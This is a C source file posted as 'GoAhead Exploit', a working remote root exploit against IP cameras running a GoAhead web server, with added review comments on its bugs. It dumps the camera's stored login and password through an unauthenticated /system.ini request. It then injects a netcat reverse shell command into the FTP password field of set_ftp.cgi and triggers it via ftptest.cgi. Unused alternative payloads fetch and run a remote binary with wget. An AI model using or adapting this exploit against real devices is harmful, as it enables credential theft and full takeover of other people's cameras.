KhaosBringer

GoAhead Exploit

May 24th, 2018
  1. #include <stdio.h>
  2. #include <string.h>
  3. #include <stdlib.h>
  4. #include <unistd.h>
  5. #include <arpa/inet.h>
  6. #include <netinet/in.h>
  7. #include <sys/types.h>
  8. #include <sys/socket.h>
  9.  
  10.  
/* TCP port of the camera's embedded web server; every request in this file goes here. */
#define CAM_PORT 80
/* Connect-back endpoint. Both values are compile-time constants that are
 * spliced into the request templates below by string-literal concatenation
 * and echoed to the operator by main(). */
#define REMOTE_HOST "192.168.1.1"
#define REMOTE_PORT "1337"
/* Request templates consumed by rce(). Each has exactly two %s slots, filled
 * with the login and the password recovered by creds(). PAYLOAD_0 stores an
 * FTP configuration whose pwd field is a shell command substitution,
 * PAYLOAD_1 triggers the FTP test that evaluates it, PAYLOAD_2 overwrites the
 * field with a fixed value. Unlike the request in creds(), these are bare
 * request lines with no HTTP version token and no headers. */
#define PAYLOAD_0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20" REMOTE_HOST "+" REMOTE_PORT "%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define PAYLOAD_1 "GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\r\n\r\n"
#define PAYLOAD_2 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\r\n\r\n"


/* Alternative forms of PAYLOAD_0. Neither is referenced anywhere in this file. */
#define ALTERNATIVE_PAYLOAD_zero0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+" REMOTE_HOST "+" REMOTE_PORT "+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define ALTERNATIVE_PAYLOAD_zero1 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://" REMOTE_HOST "/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"

/* Retrieve the configuration from the camera at argv (IPv4 string) and return
 * a calloc'd 64-byte buffer: login at offset 0, password at offset 32. NULL on
 * failure. With get_config != 0 the raw response is printed and the process
 * exits. Caller owns the returned buffer. */
char *    creds(char  *argv,
                int   get_config);

/* Format attack (a PAYLOAD_* template) with the two credential strings in id
 * and send it to the camera at argv. desc labels the progress message.
 * Returns 0 when the request was sent, 1 on any error. */
int       rce(char    *argv,
              char    *id,
              char    attack[],
              char    desc[]);
  29.  
  30.  
/*
 * Entry point. Usage: <prog> target [--get-config]
 *
 * argv[1] is the camera's IPv4 address (parsed with inet_pton in creds() and
 * rce()). When argv[2] is "--get-config", creds() prints the raw configuration
 * response and calls exit(0), so nothing after the creds() call runs in that
 * mode. Otherwise the recovered credentials are fed to four rce() requests.
 * envp is unused. Returns 1 on a usage error or when creds() fails, else 0.
 *
 * NOTE(review): the return value of each rce() call only gates a "done" line;
 * a failed request does not stop the sequence, and the closing message is
 * printed whether or not any request succeeded.
 */
int   main(int        argc,
           char       **argv,
           char       **envp)
{
  /* Buffer returned by creds(): login at id[0..31], password starting at id + 32. */
  char                *id;

  printf("Camera 0day root RCE with connect-back @PierreKimSec\n\n");

  if (argc < 2)
  {
     printf("%s target\n", argv[0]);
     printf("%s target --get-config      will dump the configuration and exit\n", argv[0]);
     return (1);
  }

  /* REMOTE_HOST / REMOTE_PORT are compile-time constants, not arguments. */
  if (argc == 2)
    printf("Please run `nc -vlp %s` on %s\n\n", REMOTE_PORT, REMOTE_HOST);

  /* Any third argument other than "--get-config" is silently ignored. */
  if (argc == 3 && !strcmp(argv[2], "--get-config"))
    id = creds(argv[1], 1);
  else
    id = creds(argv[1], 0);

  if (id == NULL)
  {
    printf("exploit failed\n");
    return (1);
  }
  printf("done\n");

  /* Both strings come from creds(); nothing here checks they are NUL-terminated
   * within the 64-byte buffer (see the strcat calls in creds()). */
  printf("    login = %s\n", id);
  printf("    pass  = %s\n", id + 32);

  /* Four requests in sequence. sleep(1) separates only the first two. rce()
   * never reads the camera's reply, so "done" means "request sent", not
   * "request accepted". Each call leaks its socket and payload buffer. */
  if (!rce(argv[1], id, PAYLOAD_0, "planting"))
    printf("done\n");
  sleep(1);
  if (!rce(argv[1], id, PAYLOAD_1, "executing"))
    printf("done\n");
  if (!rce(argv[1], id, PAYLOAD_2, "cleaning"))
    printf("done\n");
  if (!rce(argv[1], id, PAYLOAD_1, "cleaning"))
    printf("done\n");

  /* id is never freed; the process exits immediately afterwards. */
  printf("[+] enjoy your root shell on %s:%s\n", REMOTE_HOST, REMOTE_PORT);

  return (0);
}
  78.  
  79.  
/*
 * Fetch the camera's configuration with a single HTTP request that carries no
 * credentials, then locate the stored login and password in the binary body.
 *
 * argv        IPv4 address of the camera, as a string.
 * get_config  non-zero: write the raw response (capped at 10 KiB) to stdout
 *             and exit(0) without returning.
 *
 * Returns a 64-byte calloc'd buffer with the login at offset 0 and the
 * password at offset 32 (caller owns it), or NULL when the socket cannot be
 * created/connected, send() fails, allocation fails, or the reference byte
 * pattern described in the comment below is not found.
 *
 * NOTE(review): on the inet_pton, connect and send error paths the socket is
 * not closed, and if calloc(out) fails, tmp is leaked.
 */
char *    creds(char  *argv,
                int   get_config)
{
  int                 sock;
  int                 n;
  struct sockaddr_in  serv_addr;
  /* Per-recv() chunk buffer; the full response is assembled in tmp below. */
  char                buf[8192] = { 0 };
  char                *out;
  char                *tmp;
  /* The only request in this file with an HTTP version token. */
  char                payload[] = "GET /system.ini?loginuse&loginpas HTTP/1.0\r\n\r\n";
  int                 old_n;
  int                 n_total;


  sock = 0;
  n = 0;
  old_n = 0;
  n_total = 0;

  printf("[+] bypassing auth ... ");

  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  {
    printf("Error while creating socket\n");
    return (NULL);
  }

  /* NOTE(review): '0' is the character 0x30, not the value 0. The fields set
   * explicitly below overwrite it; only sin_zero keeps the 0x30 fill. */
  memset(&serv_addr, '0', sizeof(serv_addr));
  serv_addr.sin_family = AF_INET;
  serv_addr.sin_port = htons(CAM_PORT);

  if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
  {
    printf("Error while inet_pton\n");
    return (NULL);
  }

  if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
  {
    printf("creds: connect failed\n");
    return (NULL);
  }

  if (send(sock, payload, strlen(payload) , 0) < 0)
  {
    printf("creds: send failed\n");
    return (NULL);
  }

  /* 10 KiB response buffer. malloc, not calloc: bytes past the received data
   * are uninitialized, yet the search loop below reads up to tmp[10239]
   * regardless of how much was actually received. */
  if (!(tmp = malloc(10 * 1024 * sizeof(char))))
    return (NULL);

  /* Result buffer: login at out[0..31], password at out + 32. */
  if (!(out = calloc(64, sizeof(char))))
    return (NULL);

  /* Accumulate the response until the peer closes or recv() fails.
   * NOTE(review): old_n is set to the size of the *previous* chunk, not the
   * running total, so a third chunk overwrites the second rather than being
   * appended; the assembled data is only correct when the response arrives in
   * at most two chunks. The n >= 0 test is always true inside this loop.
   * tmp is never NUL-terminated. */
  while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)
  {
    n_total += n;
    if (n_total < 1024 * 10)
      memcpy(tmp + old_n, buf, n);
    if (n >= 0)
      old_n = n;
  }

  close(sock);

  /*
  [ HTTP HEADERS ]
  ...

  000????: 0000 0a0a 0a0a 01.. .... .... .... ....
                ^^^^ ^^^^ ^^
                Useful reference in the binary data
                in order to find the positions of
                credentials
  ...
  ...
  0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000  admin...........
  00006a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
  00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000  admin...........
  00006c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
  ...

  NOTE: reference can be too:
  000????: 0006 0606 0606 0100 000a .... .... ....

  Other method: parse everything, find the "admin" string and extract the associated password
  by adding 31bytes after the address of 'a'[dmin].
  Works if the login is admin (seems to be this by default, but can be changed by the user)
  */

  /* Dump mode: emit the raw bytes (headers included) one at a time and exit.
   * tmp and out are not freed; the process is ending. */
  if (get_config)
  {
    for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)
      printf("%c", tmp[j]);
    exit (0);
  }


  /* Scan for the 0a 0a 0a 0a 01 reference pattern (see comment above).
   * NOTE(review): the bound is the buffer size, not n_total, so for responses
   * shorter than 10 KiB this matches against uninitialized heap bytes. */
  for (unsigned int j = 50; j < 10 * 1024; j++)
  {
     if (tmp[j - 4] == 0x0a &&
         tmp[j - 3] == 0x0a &&
         tmp[j - 2] == 0x0a &&
         tmp[j - 1] == 0x0a &&
         tmp[j]     == 0x01)
     {
       /* Login is expected at +138 and password at +170 relative to the
        * 0x01 byte. The guard only checks that both start offsets lie inside
        * tmp; strcat has no length bound, so if the device's response lacks
        * a NUL within reach, the copy runs past the 64-byte out buffer (and
        * possibly past tmp). An unexpected or hostile response can therefore
        * crash or corrupt this tool. */
       if (j + 170 < 10 * 1024)
       {
         strcat(out, &tmp[j + 138]);
         strcat(out + 32 * sizeof(char), &tmp[j + 170]);
         free(tmp);

         return (out);
       }
     }
  }

  /* Pattern not found; out (64 bytes) is leaked here. */
  free(tmp);

  return (NULL);
}
  202.  
/*
 * Format one request template with the recovered credentials, send it to the
 * camera, and return without reading the reply.
 *
 * argv    IPv4 address of the camera, as a string.
 * id      credential buffer from creds(): login at id, password at id + 32.
 * attack  printf-style template with two %s slots (one of the PAYLOAD_*
 *         constants in main()).
 * desc    label used in the progress message.
 *
 * Returns 0 when send() succeeded, 1 on allocation, socket, address or send
 * failure.
 *
 * NOTE(review): neither the 512-byte payload buffer nor the socket is ever
 * released, on success or on any error path, so every call leaks one file
 * descriptor and one allocation. main() calls this four times.
 */
int       rce(char    *argv,
              char    *id,
              char    attack[],
              char    desc[])
{
  int                 sock;
  struct sockaddr_in  serv_addr;
  char                *payload;

  if (!(payload = calloc(512, sizeof(char))))
    return (1);

  sock = 0;

  printf("[+] %s payload ... ", desc);

  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  {
    printf("Error while creating socket\n");
    return (1);
  }

  /* NOTE(review): '0' is 0x30, not 0; only sin_zero keeps this fill because
   * the other fields are assigned below. */
  memset(&serv_addr, '0', sizeof(serv_addr));
  serv_addr.sin_family = AF_INET;
  serv_addr.sin_port = htons(CAM_PORT);

  if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
  {
    printf("Error while inet_pton\n");
    return (1);
  }

  if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
  {
    printf("rce: connect failed\n");
    return (1);
  }


  /* NOTE(review): attack is used directly as the format string and sprintf
   * writes without a bound into the 512-byte buffer. This is only safe while
   * attack is one of the compile-time PAYLOAD_* literals and both strings in
   * id are short and NUL-terminated; creds() does not guarantee the latter.
   * Never pass externally influenced data as attack. */
  sprintf(payload, attack, id, id + 32);
  /* Fire-and-forget: the camera's response is never read, so a 0 return only
   * means the bytes were handed to the kernel. */
  if (send(sock, payload, strlen(payload) , 0) < 0)
  {
    printf("rce: send failed\n");
    return (1);
  }
  return (0);
}